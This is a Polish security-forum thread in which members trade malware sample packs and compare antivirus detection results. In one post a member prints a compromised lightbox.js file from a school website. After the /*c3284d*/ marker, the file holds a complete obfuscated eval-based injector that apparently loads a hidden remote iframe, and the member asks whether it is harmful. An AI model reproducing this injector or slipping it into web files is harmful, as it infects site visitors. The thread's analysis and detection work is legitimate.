|
Paczki, malware, złośliwe pliki, linki itp.
|
|
12.08.2012, 20:18
McAlex napisał(a): NIS 2012: [Aby zobaczyć linki, zarejestruj się tutaj] MBAM Pro milczy. 
12.08.2012, 20:18
McAlex napisał(a): Kaspersky IS 2012: [Aby zobaczyć linki, zarejestruj się tutaj] [Aby zobaczyć linki, zarejestruj się tutaj] 
12.08.2012, 20:25
McAlex napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj] 
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
12.08.2012, 20:28
[Aby zobaczyć linki, zarejestruj się tutaj] Ja to mam szczęście. Najpierw zainfekowany czymś dziwnym telefon, teraz znowu wirus na stronce . I to wszystko niespecjalnie  
12.08.2012, 20:35
Hmm coś nie wierze że to coś groźnego być może wykrywa bo to nowszy lightbox 2
Lightbox JS: Fullsize Image Overlays by Lokesh Dhakar - [Aby zobaczyć linki, zarejestruj się tutaj] For more information on this script, visit: [Aby zobaczyć linki, zarejestruj się tutaj] Licensed under the Creative Commons Attribution 2.5 License - [Aby zobaczyć linki, zarejestruj się tutaj] basically, do anything you want, just leave my name and link
12.08.2012, 20:38
tachion napisał(a):Hmm coś nie wierze że to coś groźnego być może wykrywa bo to nowszy lightbox 2 Czyli zbiorowy False positive? 
12.08.2012, 21:06
tachion napisał(a): Ransomware # FakePoliceAlert - Reveton ESET6 - wykrywa Kod: http://www.1lo.pl/ESET6 - też coś wykrywa... 
12.08.2012, 21:11
Treść widoczna jedynie dla zarejestrowanych użytkowników phishing. Kto poda emaila i hasło do niego ?
12.08.2012, 21:15
12.08.2012, 21:18
Dziwne wchodziłem niedawno na tę stronę i wszystko było w porządku. Ciekawie to wygląda.
12.08.2012, 21:21
615 malware files pack 2012-08-09 by tommy:
Treść widoczna jedynie dla zarejestrowanych użytkowników
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
12.08.2012, 21:31
[Aby zobaczyć linki, zarejestruj się tutaj] Ransomware-Weelsof 1/1 ZeroAccess - CLSID 1/1 FakeAV - WinWebSec - Live Security Platinum 0/1 250 malware by tachion z dnia 2012-08-11 216/250 86,40% Wasz AV coナ・widzi? by Flash999 - blokuje 2/3 Nastト冪na partia: by Flash999 - blokuje 4/5 Ransomware # FakePoliceAlert - Reveton by tachion 1/1 To strona mojej dawnej szkoナZ by McAlex - blokuje podejrzany url [Aby zobaczyć linki, zarejestruj się tutaj] 615 malware files pack 2012-08-09 by tommy 513/615 83,41%
Podwójne dno polega na tym, że ukrywa trzecie i czwarte...
12.08.2012, 21:51
A da się jakoś pobrać ten blokowany przez wszystkie av plik i zrobić mu skan na virustotal?
12.08.2012, 22:17
Dzięki gr83:-) a mógłbyś go jeszcze wysłać na serwer ? Roześlę reszcie do analizy.
12.08.2012, 22:30
Treść widoczna jedynie dla zarejestrowanych użytkowników na końcu pliku (po /*c3284d*/) jest dodany kod wirusa, hmmm ... [Aby zobaczyć linki, zarejestruj się tutaj]
12.08.2012, 22:50
No tutaj jest taki kod na końcu
/* Lightbox JS: Fullsize Image Overlays by Lokesh Dhakar - [Aby zobaczyć linki, zarejestruj się tutaj] For more information on this script, visit: [Aby zobaczyć linki, zarejestruj się tutaj] Licensed under the Creative Commons Attribution 2.5 License - [Aby zobaczyć linki, zarejestruj się tutaj] (basically, do anything you want, just leave my name and link)Table of Contents ----------------- Configuration Functions - getPageScroll() - getPageSize() - pause() - getKey() - listenKey() - showLightbox() - hideLightbox() - initLightbox() - addLoadEvent() Function Calls - addLoadEvent(initLightbox) */ // // Configuration // // If you would like to use a custom loading image or close button reference them in the next two lines. var loadingImage = ''./include/gfx/loading.gif''; var closeButton = ''./include/gfx/close.gif''; // // getPageScroll() // Returns array with x,y page scroll values. // Core code from - quirksmode.org // function getPageScroll(){ var yScroll; if (self.pageYOffset) { yScroll = self.pageYOffset; } else if (document.documentElement && document.documentElement.scrollTop){ // Explorer 6 Strict yScroll = document.documentElement.scrollTop; } else if (document.body) {// all other Explorers yScroll = document.body.scrollTop; } arrayPageScroll = new Array('''',yScroll) return arrayPageScroll; } // // getPageSize() // Returns array with page width, height and window width, height // Core code from - quirksmode.org // Edit for Firefox by pHaez // function getPageSize(){ var xScroll, yScroll; if (window.innerHeight && window.scrollMaxY) { xScroll = document.body.scrollWidth; yScroll = window.innerHeight + window.scrollMaxY; } else if (document.body.scrollHeight > document.body.offsetHeight){ // all but Explorer Mac xScroll = document.body.scrollWidth; yScroll = document.body.scrollHeight; } else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari xScroll = document.body.offsetWidth; yScroll = document.body.offsetHeight; } var windowWidth, windowHeight; if (self.innerHeight) { // all except Explorer windowWidth = self.innerWidth; windowHeight = self.innerHeight; } else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode windowWidth = document.documentElement.clientWidth; windowHeight = document.documentElement.clientHeight; } else if (document.body) { // other Explorers windowWidth = document.body.clientWidth; windowHeight = document.body.clientHeight; } // for small pages with total height less then height of the viewport if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } // for small pages with total width less then width of the viewport if(xScroll < windowWidth){ pageWidth = windowWidth; } else { pageWidth = xScroll; } arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight) return arrayPageSize; } // // pause(numberMillis) // Pauses code execution for specified time. Uses busy code, not good. // Code from [Aby zobaczyć linki, zarejestruj się tutaj] //function pause(numberMillis) { var now = new Date(); var exitTime = now.getTime() + numberMillis; while (true) { now = new Date(); if (now.getTime() > exitTime) return; } } // // getKey(key) // Gets keycode. If ''x'' is pressed then it hides the lightbox. // function getKey(e){ if (e == null) { // ie keycode = event.keyCode; } else { // mozilla keycode = e.which; } key = String.fromCharCode(keycode).toLowerCase(); if(key == ''x''){ hideLightbox(); } } // // listenKey() // function listenKey () { document.onkeypress = getKey; } // // showLightbox() // Preloads images. Pleaces new image in lightbox then centers and displays. // function showLightbox(objLink) { // prep objects var objOverlay = document.getElementById(''overlay''); var objLightbox = document.getElementById(''lightbox''); var objCaption = document.getElementById(''lightboxCaption''); var objImage = document.getElementById(''lightboxImage''); var objLoadingImage = document.getElementById(''loadingImage''); var objLightbo  etails = document.getElementById(''lightboetails'');var arrayPageSize = getPageSize(); var arrayPageScroll = getPageScroll(); // center loadingImage if it exists if (objLoadingImage) { objLoadingImage.style.top = (arrayPageScroll[1]+ ((arrayPageSize[3]- 35 - objLoadingImage.height) / 2) + ''px''); objLoadingImage.style.left = (((arrayPageSize[0]- 20 - objLoadingImage.width) / 2) + ''px''); objLoadingImage.style.display = ''block''; } // set height of Overlay to take up whole page and show objOverlay.style.height = (arrayPageSize[1]+ ''px''); objOverlay.style.display = ''block''; // preload image imgPreload = new Image(); imgPreload.onload=function(){ objImage.src = objLink.href; // center lightbox and make sure that the top and left values are not negative // and the image placed outside the viewport var lightboxTop = arrayPageScroll[1]+ ((arrayPageSize[3]- 35 - imgPreload.height) / 2); var lightboxLeft = ((arrayPageSize[0]- 20 - imgPreload.width) / 2); objLightbox.style.top = (lightboxTop < 0) ? "0px" : lightboxTop + "px"; objLightbox.style.left = (lightboxLeft < 0) ? "0px" : lightboxLeft + "px"; objLightbo etails.style.width = imgPreload.width + ''px'';if(objLink.getAttribute(''title'')){ objCaption.style.display = ''block''; //objCaption.style.width = imgPreload.width + ''px''; objCaption.innerHTML = objLink.getAttribute(''title''); } else { objCaption.style.display = ''none''; } // A small pause between the image loading and displaying is required with IE, // this prevents the previous image displaying for a short burst causing flicker. if (navigator.appVersion.indexOf("MSIE")!=-1){ pause(250); } if (objLoadingImage) { objLoadingImage.style.display = ''none''; } // Hide select boxes as they will ''peek'' through the image in IE selects = document.getElementsByTagName("select"); for (i = 0; i != selects.length; i++) { selects[i] .style.visibility = "hidden"; } objLightbox.style.display = ''block''; // After image is loaded, update the overlay height as the new image might have // increased the overall page height. arrayPageSize = getPageSize(); objOverlay.style.height = (arrayPageSize[1]+ ''px''); // Check for ''x'' keypress listenKey(); return false; } imgPreload.src = objLink.href; } // // hideLightbox() // function hideLightbox() { // get objects objOverlay = document.getElementById(''overlay''); objLightbox = document.getElementById(''lightbox''); // hide lightbox and overlay objOverlay.style.display = ''none''; objLightbox.style.display = ''none''; // make select boxes visible selects = document.getElementsByTagName("select"); for (i = 0; i != selects.length; i++) { selects[i] .style.visibility = "visible"; } // disable keypress listener document.onkeypress = ''''; } // // initLightbox() // Function runs on window load, going through link tags looking for rel="lightbox". // These links receive onclick events that enable the lightbox display for their targets. // The function also inserts html markup at the top of the page which will be used as a // container for the overlay pattern and the inline image. // function initLightbox() { if (!document.getElementsByTagName){ return; } var anchors = document.getElementsByTagName("a"); // loop through all anchor tags for (var i=0; i<anchors.length; i++){ var anchor = anchors[i] ; if (anchor.getAttribute("href") && (anchor.getAttribute("rel") == "lightbox")){ anchor.onclick = function () {showLightbox(this); return false;} } } // the rest of this code inserts html at the top of the page that looks like this: // // <div id="overlay"> // <a href="#" onclick="hideLightbox(); return false;"><img id="loadingImage" /></a> // </div> // <div id="lightbox"> // <a href="#" onclick="hideLightbox(); return false;" title="Click anywhere to close image"> // <img id="closeButton" /> // <img id="lightboxImage" /> // </a> // <div id="lightbo etails">// <div id="lightboxCaption"></div> // <div id="keyboardMsg"></div> // </div> // </div> var objBody = document.getElementsByTagName("body").item(0); // create overlay div and hardcode some functional styles (aesthetic styles are in CSS file) var objOverlay = document.createElement("div"); objOverlay.setAttribute(''id'',''overlay''); objOverlay.onclick = function () {hideLightbox(); return false;} objOverlay.style.display = ''none''; objOverlay.style.position = ''absolute''; objOverlay.style.top = ''0''; objOverlay.style.left = ''0''; objOverlay.style.zIndex = ''90''; objOverlay.style.width = ''100%''; objBody.insertBefore(objOverlay, objBody.firstChild); var arrayPageSize = getPageSize(); var arrayPageScroll = getPageScroll(); // preload and create loader image var imgPreloader = new Image(); // if loader image found, create link to hide lightbox and create loadingimage imgPreloader.onload=function(){ var objLoadingImageLink = document.createElement("a"); objLoadingImageLink.setAttribute(''href'',''#''); objLoadingImageLink.onclick = function () {hideLightbox(); return false;} objOverlay.appendChild(objLoadingImageLink); var objLoadingImage = document.createElement("img"); objLoadingImage.src = loadingImage; objLoadingImage.setAttribute(''id'',''loadingImage''); objLoadingImage.style.position = ''absolute''; objLoadingImage.style.zIndex = ''150''; objLoadingImageLink.appendChild(objLoadingImage); imgPreloader.onload=function(){}; // clear onLoad, as IE will flip out w/animated gifs return false; } imgPreloader.src = loadingImage; // create lightbox div, same note about styles as above var objLightbox = document.createElement("div"); objLightbox.setAttribute(''id'',''lightbox''); objLightbox.style.display = ''none''; objLightbox.style.position = ''absolute''; objLightbox.style.zIndex = ''100''; objBody.insertBefore(objLightbox, objOverlay.nextSibling); // create link var objLink = document.createElement("a"); objLink.setAttribute(''href'',''#''); objLink.setAttribute(''title'',''Click to close''); objLink.onclick = function () {hideLightbox(); return false;} objLightbox.appendChild(objLink); // preload and create close button image var imgPreloadCloseButton = new Image(); // if close button image found, imgPreloadCloseButton.onload=function(){ var objCloseButton = document.createElement("img"); objCloseButton.src = closeButton; objCloseButton.setAttribute(''id'',''closeButton''); objCloseButton.style.position = ''absolute''; objCloseButton.style.zIndex = ''200''; objLink.appendChild(objCloseButton); return false; } imgPreloadCloseButton.src = closeButton; // create image var objImage = document.createElement("img"); objImage.setAttribute(''id'',''lightboxImage''); objLink.appendChild(objImage); // create details div, a container for the caption and keyboard message var objLightbo etails = document.createElement("div");objLightbo etails.setAttribute(''id'',''lightboetails'');objLightbox.appendChild(objLightbo etails);// create caption var objCaption = document.createElement("div"); objCaption.setAttribute(''id'',''lightboxCaption''); objCaption.style.display = ''none''; objLightbo etails.appendChild(objCaption);// create keyboard message var objKeyboardMsg = document.createElement("div"); objKeyboardMsg.setAttribute(''id'',''keyboardMsg''); objKeyboardMsg.innerHTML = ''naci?nij <a href="#" onclick="hideLightbox(); return false;"><kbd>x</kbd></a> aby zamkn??''; objLightbo etails.appendChild(objKeyboardMsg);} // // addLoadEvent() // Adds event to window.onload without overwriting currently assigned onload functions. // Function found at Simon Willison''s weblog - [Aby zobaczyć linki, zarejestruj się tutaj] //function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != ''function''){ window.onload = func; } else { window.onload = function(){ oldonload(); func(); } } } addLoadEvent(initLightbox); // run initLightbox onLoad /*c3284d*/ try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,88,99,94,95,91,86,107,106,94,90,97,90,107,105,35,90,101,98,38,94,105,107,102,35,103,94,101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1] ;v="eva";}if(v)e=window[v+"l"] ;w=f;s=[] ;r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;291-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx] ((w[j] *1+(9+e("j%3"))));}if(x&&f&&012===10)e(s); /*/c3284d* / Tylko jestem ciekaw czy to naprawdę groźne czy tylko popłuczyny kodu
12.08.2012, 22:52
Plik poszedł do następnego labu i informacja zwrotna , że to wirus.
|
|
« Starszy wątek | Nowszy wątek »
|
